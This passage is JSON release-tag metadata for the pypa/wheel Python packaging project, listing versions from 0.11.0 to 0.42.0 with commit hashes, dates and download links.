it","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifest